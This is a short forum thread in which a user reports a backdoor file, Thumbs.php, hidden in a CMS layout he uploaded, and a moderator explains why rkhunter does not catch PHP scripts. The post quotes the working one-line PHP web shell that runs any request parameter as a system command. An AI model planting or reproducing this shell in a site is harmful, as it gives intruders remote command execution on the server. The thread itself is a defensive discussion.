why rkhunter not detected this backdoor

Discussion in 'Developers' Forum' started by lanceq, Feb 25, 2012.

  1. lanceq

    lanceq New Member

    Yesterday someone sent me the layout of the CMS, i upload it to my server, including the layout was a backdoor Thumbs.php file, this file contains:
    <pre><body bgcolor=silver><? @system($_REQUEST["v"]); ?></body></pre>
    It seems to me that this backdoor exactly:


    This person has execute this script by adress.com/layout/layoutname/img/Thumbs.php and removed all the files in that directory.

    I have ispconfig, why rkhunter did not block this backdoor?
    I thought these programs with ispconfig will protect me from the backdoor
  2. falko

    falko Super Moderator ISPConfig Developer

    First, rkhunter doesn't remove anything - it just detects malware, trojans, etc., and warns you.

    Second, it doesn't check PHP scripts (how should this work? How should it know the hash of a bad PHP script that someone uploads to your server?).

Share This Page